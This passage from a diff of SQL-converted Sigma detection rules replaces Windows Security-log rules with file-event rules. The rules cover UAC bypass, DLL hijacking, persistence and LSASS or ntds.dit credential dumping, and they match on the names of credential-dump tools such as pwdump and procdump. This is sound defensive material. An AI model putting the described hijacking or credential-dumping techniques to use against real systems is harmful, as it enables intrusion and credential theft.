NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\'))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_legitimate_app_dropping_exe.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Abusing Winsat Path Parsing - File", + "id": "155dbf56-e0a4-4dd0-8905-8a98705045e8", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winmm.dll' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_winsat.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Cred Dump Tools Dropped Files", + "id": "8fbf3271-1ef6-4e94-8210-03c2317947f6", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Files with well-known filenames (parts of credential dump software or files produced by them) creation", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ "attack.credential_access", - "attack.t1212" + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.003", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate Administrator using tool for password recovery" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\pwdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\kirbi%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwhashes%' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_ccache%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wce\\_krbtkts%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgdump-log%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\test.pwd' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora64.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsremora.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fgexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wceaux.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SECURITY.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SYSTEM.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\NTDS.out' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpExt.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DumpSvc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cachedump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pstgdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\servpw64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwdump.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Dumpy.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_cred_dump_tools_dropped_files.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Creation Exe for Service with Unquoted Path", + "id": "8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\nAdversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows 
will choose the adversary's executable to launch.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND ServiceFileName LIKE '%vbscript:createobject%' ESCAPE '\\' AND ServiceFileName LIKE '%.run%' ESCAPE '\\' AND ServiceFileName LIKE '%window.close%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_use_mshta_services_security.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "PetitPotam Suspicious Kerberos TGT Request", - "id": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", "status": "experimental", - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "author": "Mauricio Velazco, Michael Haag", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "False positives are possible if the environment is using 
certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "status": "experimental", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ - "attack.execution", - "attack.privilege_escalation", + "attack.defense_evasion", "attack.persistence", - "attack.t1053.005" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE 
'\\')))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE 
((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. 
Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.persistence" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\'" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. 
Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "status": "experimental", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\'" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "status": "experimental", - 
"description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Anti-Virus" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ "attack.credential_access", - "car.2019-04-004", "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR 
ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": 
"file_event_win_lsass_shtinkering.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Office Macro File Creation", + "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Very common in environments that rely heavily on macro documents" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\')" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_office_macro_files_created.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "status": "experimental", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": 
"Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "cve.2021.44077" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. 
Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "status": "experimental", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 